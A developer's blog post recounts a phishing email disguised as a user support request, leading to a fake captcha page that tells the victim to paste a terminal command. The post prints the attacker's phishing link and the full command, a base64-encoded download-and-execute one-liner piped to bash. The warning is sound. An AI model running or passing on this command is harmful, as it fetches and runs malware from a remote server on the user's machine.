Tips

The scariest “user support” email I’ve ever received

Takuya Matsuyama

Takuya Matsuyama

3 min read
The scariest “user support” email I’ve ever received

Hi, it's Takuya. As your app grows in popularity, you occasionally start to attract attacks aimed directly at you—the developer or site owner. Just the other day, I got one that was honestly terrifying, so I'd like to share it.

The Email

Subject: Cookie consent prevents platform access

Hello,
I cannot access use the store.
The cookie consent notice keeps appearing and nothing happens once I approve or try to close it, so I’m unable to
interact with the website.
Please provide guidance on how to resolve this or provide an alternative solution so I can access?

In short, they’re saying:

“I can’t use your site because the cookie consent keeps blocking access.”

Weird already — because my app’s website, https://www.inkdrop.app/, doesn’t even show a cookie consent dialog. I don’t track or serve ads, so there’s no need for that.

Still, I replied politely:

Can you tell me which Url, your OS, and browser?
Kind regards,
Takuya

A bit later, I got this reply (which Gmail had automatically placed in the spam folder):

Hey,
Thanks for your previous guidance.
I'm still having trouble with access using the latest version of Firefox on Windows
It's difficult to describe the problem so I've included a screenshot.
https://sites.google.com/view/drive-845fro3buhxi/screen?fileid=15034204
Please take a look and suggest the next steps.

At first glance, it looked perfectly normal. But notice — they never actually told me which page was causing the issue. Instead, they sent a link claiming to contain a screenshot. It looked like a Google Drive link, but it was actually a Google Sites page. Without thinking, I clicked it. (You should never do this!)

The Trap

It showed a Captcha screen.
I clicked it… and got this:

It said something like “verification step” — telling me to open a terminal, paste a command, and run it. That’s when it hit me: “Oh no, this is phishing.”

The command they had copied to my clipboard was this:

echo -n Y3VybCAtc0wgLW8gL3RtcC9wakttTVVGRVl2OEFsZktSIGh0dHBzOi8vd3d3LmFtYW5hZ2VuY2llcy5jb20vYXNzZXRzL2pzL2dyZWNhcHRjaGE7IGNobW9kICt4IC90bXAvcGpLbU1VRkVZdjhBbGZLUjsgL3RtcC9wakttTVVGRVl2OEFsZktS | base64 -d | bash

Never run anything like this in your terminal. It downloads and executes a shell script from a remote server — as ChatGPT confirmed when I asked it to analyze it:

Absolutely terrifying.

Because Gmail had flagged the second message as spam, the URL was probably already reported as malicious. But the first message wasn’t flagged — so I thought, “Maybe it’s a false positive,” and replied. Big mistake.

AI-Powered spam and phishing are on the rise

Even on my user forum, I’ve started seeing suspicious posts that seem to be written by AI. They look natural at first glance, but the intent is unclear — often just spam or trolling.

Phishing emails disguised as support inquiries are getting more sophisticated, too.
They read naturally, but something always feels just a little off — the logic doesn’t quite line up, or the tone feels odd.

It’s unsettling. Stay alert, guys — the attacks are getting smarter. Hope it's helpful!

Read more